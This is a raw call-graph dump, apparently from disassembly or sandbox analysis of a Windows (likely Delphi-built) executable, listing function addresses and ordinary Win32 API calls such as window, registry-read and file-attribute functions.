50499->50500 50503 468c20 50499->50503 50501 468c18 50500->50501 51042 453344 18 API calls 50501->51042 50504 403400 4 API calls 50503->50504 50505 468c38 50504->50505 50505->50439 50507 46ace5 50506->50507 50508 46ace0 50506->50508 51128 469a80 60 API calls 50507->51128 50510 46ace3 50508->50510 51043 46a740 50508->51043 50510->50439 50511 46aced 50511->50439 50514 403400 4 API calls 50513->50514 50515 469f4a 50514->50515 51505 47dd00 50515->51505 50517 469fad 50518 469fb1 50517->50518 50519 469fca 50517->50519 51512 466800 50518->51512 50520 469fbb 50519->50520 51515 494c90 18 API calls 50519->51515 50523 46a25e 50520->50523 50525 46a154 50520->50525 50526 46a0e9 50520->50526 50527 403420 4 API calls 50523->50527 50524 469fe6 50524->50520 50528 469fee 50524->50528 50530 403494 4 API calls 50525->50530 50529 403494 4 API calls 50526->50529 50531 46a288 50527->50531 50532 46af68 37 API calls 50528->50532 50533 46a0f6 50529->50533 50534 46a161 50530->50534 50531->50441 50543 469ffb 50532->50543 50535 40357c 18 API calls 50533->50535 50536 40357c 18 API calls 50534->50536 50538 46a103 50535->50538 50537 46a16e 50536->50537 50540 40357c 18 API calls 50537->50540 50539 40357c 18 API calls 50538->50539 50541 46a110 50539->50541 50542 46a17b 50540->50542 50544 40357c 18 API calls 50541->50544 50545 40357c 18 API calls 50542->50545 50548 46a024 SetActiveWindow 50543->50548 50549 46a03c 50543->50549 50546 46a11d 50544->50546 50547 46a188 50545->50547 50550 466800 34 API calls 50546->50550 50551 40357c 18 API calls 50547->50551 50548->50549 51516 42f560 50549->51516 50552 46a12b 50550->50552 50553 46a196 50551->50553 50555 40357c 18 API calls 50552->50555 50556 414b18 18 API calls 50553->50556 50558 46a134 50555->50558 50559 46a152 50556->50559 50561 40357c 18 API calls 50558->50561 51533 466b38 50559->51533 50564 46a141 50561->50564 50563 46a08d 50566 46ade4 35 API calls 50563->50566 50565 414b18 18 API calls 50564->50565 50565->50559 50567 46a0bf 50566->50567 50567->50441 50575 468c74 33 API calls 50574->50575 50576 46af80 50575->50576 50577 46afa2 50576->50577 50578 4652cc 21 API calls 50576->50578 51729 4652cc 50577->51729 50578->50577 50582 46afba 50583 46ade4 35 API calls 50582->50583 50584 46aff2 50583->50584 50585 414b18 18 API calls 50584->50585 50586 46b006 50585->50586 50587 46b012 50586->50587 50588 46b03c 50586->50588 50589 414b18 18 API calls 50587->50589 50591 46b05b 50588->50591 50592 46b085 50588->50592 50590 46b026 50589->50590 50593 414b18 18 API calls 50590->50593 50594 414b18 18 API calls 50591->50594 50595 414b18 18 API calls 50592->50595 50597 46b03a 50593->50597 50598 46b06f 50594->50598 50596 46b099 50595->50596 50599 414b18 18 API calls 50596->50599 51746 46acfc 50597->51746 50600 414b18 18 API calls 50598->50600 50599->50597 50600->50597 50652 46c424 62 API calls 50651->50652 50653 4830c7 50652->50653 50654 4830d0 50653->50654 52016 408be0 19 API calls 50653->52016 50656 414ae8 18 API calls 50654->50656 50657 4830e0 50656->50657 50658 403450 18 API calls 50657->50658 50659 4830ed 50658->50659 51818 46c77c 50659->51818 50662 4830fd 50664 414ae8 18 API calls 50662->50664 50665 48310d 50664->50665 50666 403450 18 API calls 50665->50666 50667 48311a 50666->50667 50668 469868 SendMessageA 50667->50668 50669 483133 50668->50669 50670 483184 50669->50670 52018 479e18 37 API calls 50669->52018 51847 4241dc IsIconic 50670->51847 50674 48319f SetActiveWindow 50675 4831b4 50674->50675 51855 4824b4 50675->51855 50724->50420 50725->50422 50726->50422 50727->50422 53689 43d9c8 50728->53689 50731 494dcc 53694 431bd0 50731->53694 50732 494e52 50733 494e61 50732->50733 53727 4945c8 18 API calls 50732->53727 50733->50439 50742 494e16 53725 49465c 18 API calls 50742->53725 50744 494e2a 53726 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50744->53726 50746 494e4a 50746->50439 50747->50430 50749 457f41 50748->50749 50750 457f61 50749->50750 50751 4078f4 33 API calls 50749->50751 50753 403400 4 API calls 50750->50753 50752 457f59 50751->50752 50754 457d10 38 API calls 50752->50754 50755 457f76 50753->50755 50754->50750 50755->50449 50764->50439 50790 46c4bc 50765->50790 50768 414ae8 50769 414af6 50768->50769 50770 4034e0 18 API calls 50769->50770 50771 414b03 50770->50771 50771->50466 50772->50479 50774 46661a 50773->50774 50993 4078f4 50774->50993 51036 42cccc 50782->51036 50785 451458 50786 451428 18 API calls 50785->50786 50787 451474 50786->50787 50788 47efd0 56 API calls 50787->50788 50788->50475 50789->50468 50791 414ae8 18 API calls 50790->50791 50792 46c4f0 50791->50792 50851 466898 50792->50851 50796 46c502 50797 46c511 50796->50797 50800 46c52a 50796->50800 50920 47efd0 56 API calls 50797->50920 50799 403420 4 API calls 50802 46b702 50799->50802 50801 46c571 50800->50801 50803 46c558 50800->50803 50804 46c5d6 50801->50804 50809 46c575 50801->50809 50802->50463 50802->50768 50921 47efd0 56 API calls 50803->50921 50923 42cb4c CharNextA 50804->50923 50807 46c5e5 50808 46c5e9 50807->50808 50813 46c602 50807->50813 50924 47efd0 56 API calls 50808->50924 50811 46c5bd 50809->50811 50809->50813 50922 47efd0 56 API calls 50811->50922 50812 46c626 50925 47efd0 56 API calls 50812->50925 50813->50812 50865 466a08 50813->50865 50818 46c525 50818->50799 50821 46c63f 50873 403778 50821->50873 50826 46c666 50926 466a94 18 API calls 50826->50926 50827 46c697 50884 42c8cc 50827->50884 50830 46c679 50832 451458 18 API calls 50830->50832 50834 46c686 50832->50834 50927 47efd0 56 API calls 50834->50927 50856 4668b2 50851->50856 50852 406bb0 18 API calls 50852->50856 50854 42cbc0 20 API calls 50854->50856 50855 403450 18 API calls 50855->50856 50856->50852 50856->50854 50856->50855 50857 4668fb 50856->50857 50930 42caac 50856->50930 50858 403420 4 API calls 50857->50858 50859 466915 50858->50859 50860 414b18 50859->50860 50861 414ae8 18 API calls 50860->50861 50862 414b3c 50861->50862 50863 403400 4 API calls 50862->50863 50864 414b6d 50863->50864 50864->50796 50866 466a12 50865->50866 50867 466a25 50866->50867 50946 42cb3c CharNextA 50866->50946 50867->50812 50869 466a38 50867->50869 50870 466a42 50869->50870 50871 466a6f 50870->50871 50947 42cb3c CharNextA 50870->50947 50871->50812 50871->50821 50874 4037aa 50873->50874 50875 40377d 50873->50875 50876 403400 4 API calls 50874->50876 50875->50874 50877 403791 50875->50877 50879 4037a0 50876->50879 50878 4034e0 18 API calls 50877->50878 50878->50879 50880 42c99c 50879->50880 50881 42c9b2 50880->50881 50882 42c9f5 50880->50882 50881->50882 50948 42cb3c CharNextA 50881->50948 50882->50826 50882->50827 50949 42c674 50884->50949 50920->50818 50921->50818 50922->50818 50923->50807 50924->50818 50925->50818 50926->50830 50927->50818 50931 403494 4 API calls 50930->50931 50932 42cabc 50931->50932 50933 403744 18 API calls 50932->50933 50937 42caf2 50932->50937 50939 42c444 IsDBCSLeadByte 50932->50939 50933->50932 50935 42cb36 50935->50856 50937->50935 50940 4037b8 50937->50940 50945 42c444 IsDBCSLeadByte 50937->50945 50939->50932 50941 403744 18 API calls 50940->50941 50943 4037c6 50941->50943 50942 4037fc 50942->50937 50943->50942 50944 4038a4 18 API calls 50943->50944 50944->50942 50945->50937 50946->50866 50947->50870 50948->50881 50952 42c67c 50949->50952 50951 42c67b 50955 42c68d 50952->50955 50953 42c6f1 50956 42c6ec 50953->50956 50960 42c444 IsDBCSLeadByte 50953->50960 50955->50953 50958 42c6ab 50955->50958 50956->50951 50958->50956 50959 42c444 IsDBCSLeadByte 50958->50959 50959->50958 50960->50956 50996 407908 50993->50996 50997 407925 50996->50997 51004 4075b8 50997->51004 51000 407951 51002 4034e0 18 API calls 51000->51002 51003 407903 51002->51003 51003->50486 51007 4075d3 51004->51007 51005 4075e5 51005->51000 51009 4069a0 19 API calls 51005->51009 51007->51005 51010 4076da 33 API calls 51007->51010 51011 4075ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51007->51011 51009->51000 51010->51007 51011->51007 51037 42cbc0 20 API calls 51036->51037 51038 42ccee 51037->51038 51039 42ccf6 GetFileAttributesA 51038->51039 51040 403400 4 API calls 51039->51040 51041 42cd13 51040->51041 51041->50475 51041->50785 51042->50503 51045 46a787 51043->51045 51044 46abff 51047 46ac1a 51044->51047 51048 46ac4b 51044->51048 51045->51044 51046 46a842 51045->51046 51049 403494 4 API calls 51045->51049 51052 46a863 51046->51052 51053 46a8a4 51046->51053 51050 403494 4 API calls 51047->51050 51051 403494 4 API calls 51048->51051 51055 46a7c6 51049->51055 51056 46ac28 51050->51056 51057 46ac59 51051->51057 51054 403494 4 API calls 51052->51054 51061 403400 4 API calls 51053->51061 51058 46a871 51054->51058 51059 414ae8 18 API calls 51055->51059 51155 46915c 26 API calls 51056->51155 51156 46915c 26 API calls 51057->51156 51063 414ae8 18 API calls 51058->51063 51064 46a7e7 51059->51064 51065 46a8a2 51061->51065 51067 46a892 51063->51067 51129 403634 51064->51129 51085 46a988 51065->51085 51135 469868 51065->51135 51066 46ac36 51069 403400 4 API calls 51066->51069 51070 403634 18 API calls 51067->51070 51073 46ac7c 51069->51073 51070->51065 51078 403400 4 API calls 51073->51078 51074 46aa10 51076 403400 4 API calls 51074->51076 51081 46aa0e 51076->51081 51077 46a8c4 51082 46a902 51077->51082 51083 46a8ca 51077->51083 51079 46ac84 51078->51079 51084 403420 4 API calls 51079->51084 51150 469ca4 57 API calls 51081->51150 51086 403400 4 API calls 51082->51086 51087 403494 4 API calls 51083->51087 51089 46ac91 51084->51089 51085->51074 51090 46a9cf 51085->51090 51091 46a900 51086->51091 51088 46a8d8 51087->51088 51141 47c26c 51088->51141 51089->50510 51095 403494 4 API calls 51090->51095 51144 469b5c 51091->51144 51099 46a9dd 51095->51099 51097 46aa39 51105 46aa44 51097->51105 51106 46aa9a 51097->51106 51098 46a8f0 51101 403634 18 API calls 51098->51101 51102 414ae8 18 API calls 51099->51102 51101->51091 51104 46a9fe 51102->51104 51107 403634 18 API calls 51104->51107 51109 403494 4 API calls 51105->51109 51108 403400 4 API calls 51106->51108 51107->51081 51115 46aaa2 51108->51115 51117 46aa52 51109->51117 51110 46a929 51111 46a934 51110->51111 51112 46a98a 51110->51112 51114 403494 4 API calls 51111->51114 51113 403400 4 API calls 51112->51113 51113->51085 51119 46a942 51114->51119 51127 46ab4b 51115->51127 51151 494c90 18 API calls 51115->51151 51117->51115 51121 403634 18 API calls 51117->51121 51123 46aa98 51117->51123 51118 46aac5 51118->51127 51152 494f3c 32 API calls 51118->51152 51119->51085 51122 403634 18 API calls 51119->51122 51121->51117 51122->51119 51123->51115 51125 46abec 51154 429144 SendMessageA SendMessageA 51125->51154 51153 4290f4 SendMessageA 51127->51153 51128->50511 51130 40363c 51129->51130 51131 4034bc 18 API calls 51130->51131 51132 40364f 51131->51132 51133 403450 18 API calls 51132->51133 51134 403677 51133->51134 51157 42a040 SendMessageA 51135->51157 51137 469877 51138 469897 51137->51138 51158 42a040 SendMessageA 51137->51158 51138->51077 51140 469887 51140->51077 51159 47c2b4 51141->51159 51148 469b89 51144->51148 51145 469beb 51146 403400 4 API calls 51145->51146 51147 469c00 51146->51147 51147->51110 51148->51145 51504 469ae0 57 API calls 51148->51504 51150->51097 51151->51118 51152->51127 51153->51125 51154->51044 51155->51066 51156->51066 51157->51137 51158->51140 51160 403494 4 API calls 51159->51160 51167 47c2e7 51160->51167 51161 47c3f9 51162 403420 4 API calls 51161->51162 51163 47c289 51162->51163 51163->51098 51165 403778 18 API calls 51165->51167 51167->51161 51167->51165 51170 4037b8 18 API calls 51167->51170 51171 47b100 51167->51171 51415 453344 18 API calls 51167->51415 51416 403800 51167->51416 51420 42c97c CharPrevA 51167->51420 51170->51167 51172 47b152 51171->51172 51173 47b130 51171->51173 51174 47b172 51172->51174 51175 47b160 51172->51175 51173->51172 51425 47a030 33 API calls 51173->51425 51178 47b1d5 51174->51178 51179 47b180 51174->51179 51176 403494 4 API calls 51175->51176 51230 47b16d 51176->51230 51188 47b1f6 51178->51188 51189 47b1e3 51178->51189 51181 47b1af 51179->51181 51182 47b189 51179->51182 51180 403400 4 API calls 51183 47baf8 51180->51183 51185 47b1c2 51181->51185 51427 453344 18 API calls 51181->51427 51184 47b19c 51182->51184 51426 453344 18 API calls 51182->51426 51187 403400 4 API calls 51183->51187 51191 403494 4 API calls 51184->51191 51186 403494 4 API calls 51185->51186 51186->51230 51193 47bb00 51187->51193 51195 47b217 51188->51195 51196 47b204 51188->51196 51194 403494 4 API calls 51189->51194 51191->51230 51193->51167 51194->51230 51198 47b267 51195->51198 51199 47b225 51195->51199 51197 403494 4 API calls 51196->51197 51197->51230 51206 47b275 51198->51206 51207 47b288 51198->51207 51200 47b241 51199->51200 51201 47b22e 51199->51201 51203 47b254 51200->51203 51428 453344 18 API calls 51200->51428 51202 403494 4 API calls 51201->51202 51202->51230 51205 403494 4 API calls 51203->51205 51205->51230 51208 403494 4 API calls 51206->51208 51209 47b296 51207->51209 51210 47b2a9 51207->51210 51208->51230 51211 403494 4 API calls 51209->51211 51212 47b2b7 51210->51212 51213 47b2ca 51210->51213 51211->51230 51214 403494 4 API calls 51212->51214 51215 47b2eb 51213->51215 51216 47b2d8 51213->51216 51214->51230 51218 47b327 51215->51218 51219 47b2f9 51215->51219 51217 403494 4 API calls 51216->51217 51217->51230 51224 47b335 51218->51224 51229 47b364 51218->51229 51220 47b315 51219->51220 51221 47b302 51219->51221 51223 47c26c 57 API calls 51220->51223 51222 403494 4 API calls 51221->51222 51222->51230 51223->51230 51225 47b351 51224->51225 51226 47b33e 51224->51226 51228 403494 4 API calls 51225->51228 51227 403494 4 API calls 51226->51227 51227->51230 51228->51230 51231 47b372 51229->51231 51232 47b3a0 51229->51232 51230->51180 51233 47b38e 51231->51233 51234 47b37b 51231->51234 51237 47b3ae 51232->51237 51238 47b3dd 51232->51238 51236 47c26c 57 API calls 51233->51236 51235 403494 4 API calls 51234->51235 51235->51230 51236->51230 51239 47b3b7 51237->51239 51240 47b3ca 51237->51240 51243 47b3fe 51238->51243 51244 47b3eb 51238->51244 51415->51167 51417 40382f 51416->51417 51418 403804 51416->51418 51417->51167 51419 4038a4 18 API calls 51418->51419 51419->51417 51420->51167 51425->51173 51426->51184 51427->51185 51428->51203 51504->51148 51506 47dd56 51505->51506 51507 47dd19 51505->51507 51506->50517 51537 455d0c 51507->51537 51511 47dd6d 51511->50517 51656 466714 51512->51656 51515->50524 51517 42f56c 51516->51517 51518 42f58f GetActiveWindow GetFocus 51517->51518 51519 41eea4 2 API calls 51518->51519 51520 42f5a6 51519->51520 51521 42f5c3 51520->51521 51522 42f5b3 RegisterClassA 51520->51522 51523 42f652 SetFocus 51521->51523 51524 42f5d1 CreateWindowExA 51521->51524 51522->51521 51525 403400 4 API calls 51523->51525 51524->51523 51526 42f604 51524->51526 51527 42f66e 51525->51527 51687 42427c 51526->51687 51532 494f3c 32 API calls 51527->51532 51529 42f62c 51530 42f634 CreateWindowExA 51529->51530 51530->51523 51531 42f64a ShowWindow 51530->51531 51531->51523 51532->50563 51693 44b514 51533->51693 51538 455d1d 51537->51538 51539 455d21 51538->51539 51540 455d2a 51538->51540 51563 455a10 51539->51563 51571 455af0 43 API calls 51540->51571 51543 455d27 51543->51506 51544 47d970 51543->51544 51549 47da6c 51544->51549 51551 47d9b0 51544->51551 51545 403420 4 API calls 51546 47db4f 51545->51546 51546->51511 51556 47dabd 51549->51556 51559 47da0f 51549->51559 51626 479630 51549->51626 51551->51549 51552 47da18 51551->51552 51555 47c26c 57 API calls 51551->51555 51551->51559 51600 479770 51551->51600 51611 4798d4 51551->51611 51552->51551 51557 47c26c 57 API calls 51552->51557 51562 47da59 51552->51562 51615 42c92c 51552->51615 51620 42c954 51552->51620 51625 47d67c 66 API calls 51552->51625 51553 47c26c 57 API calls 51553->51556 51554 454100 34 API calls 51554->51556 51555->51551 51556->51549 51556->51553 51556->51554 51556->51562 51557->51552 51559->51545 51562->51559 51572 42de1c 51563->51572 51565 455a2d 51566 455a7b 51565->51566 51575 455944 51565->51575 51566->51543 51569 455944 20 API calls 51570 455a5c RegCloseKey 51569->51570 51570->51543 51571->51543 51573 42de27 51572->51573 51574 42de2d RegOpenKeyExA 51572->51574 51573->51574 51574->51565 51580 42dd58 51575->51580 51577 403420 4 API calls 51578 4559f6 51577->51578 51578->51569 51579 45596c 51579->51577 51583 42dc00 51580->51583 51584 42dc26 RegQueryValueExA 51583->51584 51589 42dc49 51584->51589 51599 42dc6b 51584->51599 51585 403400 4 API calls 51587 42dd37 51585->51587 51586 42dc63 51588 403400 4 API calls 51586->51588 51587->51579 51588->51599 51589->51586 51590 4034e0 18 API calls 51589->51590 51591 403744 18 API calls 51589->51591 51589->51599 51590->51589 51592 42dca0 RegQueryValueExA 51591->51592 51592->51584 51593 42dcbc 51592->51593 51594 4038a4 18 API calls 51593->51594 51593->51599 51595 42dcfe 51594->51595 51596 42dd10 51595->51596 51598 403744 18 API calls 51595->51598 51597 403450 18 API calls 51596->51597 51597->51599 51598->51596 51599->51585 51601 479786 51600->51601 51602 479782 51600->51602 51603 403450 18 API calls 51601->51603 51602->51551 51604 479793 51603->51604 51605 4797b3 51604->51605 51606 479799 51604->51606 51608 479630 33 API calls 51605->51608 51607 479630 33 API calls 51606->51607 51609 4797af 51607->51609 51608->51609 51610 403400 4 API calls 51609->51610 51610->51602 51612 4798e0 51611->51612 51613 4798fb 51612->51613 51638 453344 18 API calls 51612->51638 51613->51551 51639 42c79c 51615->51639 51618 403778 18 API calls 51619 42c94e 51618->51619 51619->51552 51621 42c79c IsDBCSLeadByte 51620->51621 51622 42c964 51621->51622 51623 403778 18 API calls 51622->51623 51624 42c975 51623->51624 51624->51552 51625->51552 51627 47964b 51626->51627 51630 47967c 51627->51630 51637 47970a 51627->51637 51651 4794e4 33 API calls 51627->51651 51628 4796a1 51633 4796c2 51628->51633 51653 4794e4 33 API calls 51628->51653 51630->51628 51652 4794e4 33 API calls 51630->51652 51634 479702 51633->51634 51633->51637 51654 453344 18 API calls 51633->51654 51645 479368 51634->51645 51637->51549 51638->51613 51640 42c67c IsDBCSLeadByte 51639->51640 51642 42c7b1 51640->51642 51641 42c7fb 51641->51618 51642->51641 51644 42c444 IsDBCSLeadByte 51642->51644 51644->51642 51646 4793a3 51645->51646 51647 403450 18 API calls 51646->51647 51648 4793c8 51647->51648 51655 477a58 33 API calls 51648->51655 51650 479409 51650->51637 51651->51630 51652->51628 51653->51633 51654->51634 51655->51650 51657 403494 4 API calls 51656->51657 51658 466742 51657->51658 51673 42dbc8 51658->51673 51661 42dbc8 19 API calls 51662 466766 51661->51662 51663 466600 33 API calls 51662->51663 51664 466770 51663->51664 51665 42dbc8 19 API calls 51664->51665 51666 46677f 51665->51666 51676 466678 51666->51676 51669 42dbc8 19 API calls 51670 466798 51669->51670 51671 403400 4 API calls 51670->51671 51672 4667ad 51671->51672 51672->50520 51680 42db10 51673->51680 51677 466698 51676->51677 51678 4078f4 33 API calls 51677->51678 51679 4666e2 51678->51679 51679->51669 51681 42db30 51680->51681 51682 42dbbb 51680->51682 51681->51682 51683 4037b8 18 API calls 51681->51683 51685 403800 18 API calls 51681->51685 51686 42c444 IsDBCSLeadByte 51681->51686 51682->51661 51683->51681 51685->51681 51686->51681 51688 4242ae 51687->51688 51689 42428e GetWindowTextA 51687->51689 51691 403494 4 API calls 51688->51691 51690 4034e0 18 API calls 51689->51690 51692 4242ac 51690->51692 51691->51692 51692->51529 51696 44b38c 51693->51696 51697 44b3bf 51696->51697 51698 414ae8 18 API calls 51697->51698 51699 44b3d2 51698->51699 51700 44b3ff GetDC 51699->51700 51701 40357c 18 API calls 51699->51701 51707 41a1e8 51700->51707 51701->51700 51704 44b430 51715 44b0c0 51704->51715 51708 41a213 51707->51708 51709 41a2af 51707->51709 51726 403520 51708->51726 51710 403400 4 API calls 51709->51710 51711 41a2c7 SelectObject 51710->51711 51711->51704 51713 41a26b 51714 41a2a3 CreateFontIndirectA 51713->51714 51714->51709 51716 44b0d7 51715->51716 51727 4034e0 18 API calls 51726->51727 51728 40352a 51727->51728 51728->51713 51732 4652d7 51729->51732 51730 4653b2 51740 46708c 51730->51740 51731 46536a 51731->51730 51758 4185b8 21 API calls 51731->51758 51732->51730 51735 465327 51732->51735 51752 421a1c 51732->51752 51735->51731 51736 465361 51735->51736 51737 46536c 51735->51737 51738 421a1c 21 API calls 51736->51738 51739 421a1c 21 API calls 51737->51739 51738->51731 51739->51731 51741 4670bc 51740->51741 51742 46709d 51740->51742 51741->50582 51743 414b18 18 API calls 51742->51743 51744 4670ab 51743->51744 51745 414b18 18 API calls 51744->51745 51745->51741 51753 421a74 51752->51753 51755 421a2a 51752->51755 51753->51735 51754 421a59 51754->51753 51767 421d28 SetFocus GetFocus 51754->51767 51755->51754 51759 408cbc 51755->51759 51758->51730 51760 408cc8 51759->51760 51768 406dec LoadStringA 51760->51768 51763 403450 18 API calls 51764 408cf9 51763->51764 51765 403400 4 API calls 51764->51765 51766 408d0e 51765->51766 51766->51754 51767->51753 51769 4034e0 18 API calls 51768->51769 51770 406e19 51769->51770 51770->51763 51819 46c7a5 51818->51819 51820 414ae8 18 API calls 51819->51820 51835 46c7f2 51819->51835 51821 46c7bb 51820->51821 52025 466924 20 API calls 51821->52025 51822 403420 4 API calls 51824 46c89c 51822->51824 51824->50662 52017 408be0 19 API calls 51824->52017 51825 46c7c3 51826 414b18 18 API calls 51825->51826 51827 46c7d1 51826->51827 51828 46c7de 51827->51828 51830 46c7f7 51827->51830 52026 47efd0 56 API calls 51828->52026 51831 46c80f 51830->51831 51833 466a08 CharNextA 51830->51833 52027 47efd0 56 API calls 51831->52027 51834 46c80b 51833->51834 51834->51831 51836 46c825 51834->51836 51835->51822 51837 46c841 51836->51837 51838 46c82b 51836->51838 51840 42c99c CharNextA 51837->51840 52028 47efd0 56 API calls 51838->52028 51841 46c84e 51840->51841 51841->51835 52029 466a94 18 API calls 51841->52029 51843 46c865 51844 451458 18 API calls 51843->51844 51845 46c872 51844->51845 52030 47efd0 56 API calls 51845->52030 51848 4241ed SetActiveWindow 51847->51848 51852 424223 51847->51852 52031 42364c 51848->52031 51852->50674 51852->50675 51853 42420a 51853->51852 51854 42421d SetFocus 51853->51854 51854->51852 51856 482505 51855->51856 51857 4824d7 51855->51857 51859 475bd0 51856->51859 52044 494cec 32 API calls 51857->52044 52045 457d10 51859->52045 51863 475c26 52018->50670 52025->51825 52026->51835 52027->51835 52028->51835 52029->51843 52030->51835 52040 4235f8 SystemParametersInfoA 52031->52040 52034 423665 ShowWindow 52036 423670 52034->52036 52037 423677 52034->52037 52043 423628 SystemParametersInfoA 52036->52043 52039 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 52037->52039 52039->51853 52041 423616 52040->52041 52041->52034 52042 423628 SystemParametersInfoA 52041->52042 52042->52034 52043->52037 52044->51856 52046 457e44 52045->52046 52047 457d3c 52045->52047 52048 457e95 52046->52048 52521 45757c 20 API calls 52046->52521 52517 457a0c GetSystemTimeAsFileTime FileTimeToSystemTime 52047->52517 52051 403400 4 API calls 52048->52051 52053 457eaa 52051->52053 52052 457d44 52054 4078f4 33 API calls 52052->52054 52066 4072a8 52053->52066 52055 457db5 52054->52055 52518 457d00 34 API calls 52055->52518 52057 457e0b 52059 403778 18 API calls 52061 457dbd 52059->52061 52061->52057 52061->52059 52063 457d00 34 API calls 52061->52063 52063->52061 52067 403738 52066->52067 52068 4072b2 SetCurrentDirectoryA 52067->52068 52068->51863 52517->52052 52518->52061 52521->52048 53728 431eec 53689->53728 53691 43d9f2 53692 403400 4 API calls 53691->53692 53693 43da76 53692->53693 53693->50731 53693->50732 53695 431bd6 53694->53695 53696 402648 18 API calls 53695->53696 53697 431c06 53696->53697 53698 4947f8 53697->53698 53699 4948cd 53698->53699 53700 494812 53698->53700 53705 494910 53699->53705 53700->53699 53702 433d6c 18 API calls 53700->53702 53704 403450 18 API calls 53700->53704 53733 408c0c 18 API calls 53700->53733 53734 431ca0 53700->53734 53702->53700 53704->53700 53706 49492c 53705->53706 53742 433d6c 53706->53742 53708 494931 53709 431ca0 18 API calls 53708->53709 53710 49493c 53709->53710 53711 43d594 53710->53711 53712 43d5c1 53711->53712 53713 43d5b3 53711->53713 53712->50742 53713->53712 53714 43d63d 53713->53714 53718 447084 18 API calls 53713->53718 53721 43d6f7 53714->53721 53745 447084 53714->53745 53716 43d688 53751 43dd50 53716->53751 53718->53713 53719 43d8fd 53719->53712 53771 447024 18 API calls 53719->53771 53721->53719 53722 43d8de 53721->53722 53769 447024 18 API calls 53721->53769 53770 447024 18 API calls 53722->53770 53725->50744 53726->50746 53727->50733 53729 403494 4 API calls 53728->53729 53731 431efb 53729->53731 53730 431f25 53730->53691 53731->53730 53732 403744 18 API calls 53731->53732 53732->53731 53733->53700 53735 431cc0 53734->53735 53736 431cae 53734->53736 53738 431ce2 53735->53738 53741 431c40 18 API calls 53735->53741 53740 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53736->53740 53738->53700 53740->53735 53741->53738 53743 402648 18 API calls 53742->53743 53744 433d7b 53743->53744 53744->53708 53746 4470a3 53745->53746 53747 4470aa 53745->53747 53772 446e30 18 API calls 53746->53772 53749 431ca0 18 API calls 53747->53749 53750 4470ba 53749->53750 53750->53716 53752 43dd6c 53751->53752 53757 43dd99 53751->53757 53753 402660 4 API calls 53752->53753 53752->53757 53753->53752 53754 43ddce 53754->53721 53756 43fea5 53756->53754 53777 447024 18 API calls 53756->53777 53757->53754 53757->53756 53758 447024 18 API calls 53757->53758 53760 43c938 18 API calls 53757->53760 53761 433b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53757->53761 53765 433d18 18 API calls 53757->53765 53766 436650 18 API calls 53757->53766 53767 446e30 18 API calls 53757->53767 53768 431c40 18 API calls 53757->53768 53773 436e4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53757->53773 53774 4396e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53757->53774 53775 43dc48 32 API calls 53757->53775 53776 433d34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53757->53776 53758->53757 53760->53757 53761->53757 53765->53757 53766->53757 53767->53757 53768->53757 53769->53721 53770->53719 53771->53719 53772->53747 53773->53757 53774->53757 53775->53757 53776->53757 53777->53756 53779 41fb58 53780 41fb61 53779->53780 53783 41fdfc 53780->53783 53782 41fb6e 53784 41feee 53783->53784 53785 41fe13 53783->53785 53784->53782 53785->53784 53804 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53785->53804 53787 41fe49 53788 41fe73 53787->53788 53789 41fe4d 53787->53789 53814 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53788->53814 53805 41fb9c 53789->53805 53792 41fe81 53795 41fe85 53792->53795 53796 41feab 53792->53796 53794 41fb9c 10 API calls 53803 41fe71 53794->53803 53797 41fb9c 10 API calls 53795->53797 53798 41fb9c 10 API calls 53796->53798 53799 41fe97 53797->53799 53800 41febd 53798->53800 53801 41fb9c 10 API calls 53799->53801 53802 41fb9c 10 API calls 53800->53802 53801->53803 53802->53803 53803->53782 53804->53787 53806 41fbb7 53805->53806 53807 41fbcd 53806->53807 53808 41f93c 4 API calls 53806->53808 53815 41f93c 53807->53815 53808->53807 53810 41fc15 53811 41fc38 SetScrollInfo 53810->53811 53823 41fa9c 53811->53823 53814->53792 53816 4181e0 53815->53816 53817 41f959 GetWindowLongA 53816->53817 53818 41f996 53817->53818 53819 41f976 53817->53819 53835 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53818->53835 53834 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53819->53834 53822 41f982 53822->53810 53824 41faaa 53823->53824 53825 41fab2 53823->53825 53824->53794 53826 41faf1 53825->53826 53827 41fae1 53825->53827 53833 41faef 53825->53833 53837 417e48 IsWindowVisible ScrollWindow SetWindowPos 53826->53837 53836 417e48 IsWindowVisible ScrollWindow SetWindowPos 53827->53836 53828 41fb31 GetScrollPos 53828->53824 53831 41fb3c 53828->53831 53832 41fb4b SetScrollPos 53831->53832 53832->53824 53833->53828 53834->53822 53835->53822 53836->53833 53837->53833 53838 420598 53839 4205ab 53838->53839 53859 415b30 53839->53859 53841 4206f2 53842 420709 53841->53842 53866 4146d4 KiUserCallbackDispatcher 53841->53866 53846 420720 53842->53846 53867 414718 KiUserCallbackDispatcher 53842->53867 53843 420651 53864 420848 34 API calls 53843->53864 53844 4205e6 53844->53841 53844->53843 53852 420642 MulDiv 53844->53852 53848 420742 53846->53848 53868 420060 12 API calls 53846->53868 53850 42066a 53850->53841 53865 420060 12 API calls 53850->53865 53863 41a304 19 API calls 53852->53863 53855 420687 53856 4206a3 MulDiv 53855->53856 53857 4206c6 53855->53857 53856->53857 53857->53841 53858 4206cf MulDiv 53857->53858 53858->53841 53860 415b42 53859->53860 53869 414470 53860->53869 53862 415b5a 53862->53844 53863->53843 53864->53850 53865->53855 53866->53842 53867->53846 53868->53848 53870 41448a 53869->53870 53873 410458 53870->53873 53872 4144a0 53872->53862 53876 40dca4 53873->53876 53875 41045e 53875->53872 53877 40dd06 53876->53877 53880 40dcb7 53876->53880 53883 40dd14 53877->53883 53881 40dd14 33 API calls 53880->53881 53882 40dce1 53881->53882 53882->53875 53884 40dd24 53883->53884 53886 40dd3a 53884->53886 53895 40e09c 53884->53895 53911 40d5e0 53884->53911 53914 40df4c 53886->53914 53889 40d5e0 19 API calls 53890 40dd42 53889->53890 53890->53889 53891 40ddae 53890->53891 53917 40db60 53890->53917 53893 40df4c 19 API calls 53891->53893 53894 40dd10 53893->53894 53894->53875 53931 